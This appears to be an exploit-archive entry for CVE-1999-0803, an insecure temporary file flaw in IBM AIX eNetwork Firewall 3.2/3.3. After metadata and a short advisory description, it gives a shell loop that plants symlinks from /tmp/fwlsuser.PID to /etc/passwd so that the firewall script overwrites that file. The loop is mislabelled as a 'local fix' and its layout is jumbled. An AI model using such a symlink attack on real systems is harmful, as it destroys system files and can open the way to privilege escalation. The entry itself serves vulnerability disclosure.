IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation

Author: Paul Cammidge
type: local
platform: aix
port: 
date_added: 1999-05-25  
date_updated: 2012-06-16  
verified: 1  
codes: CVE-1999-0803;OSVDB-962  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19229.txt  

soure: https://www.securityfocus.com/bid/287/info

IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.

x = 5000
while true

LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit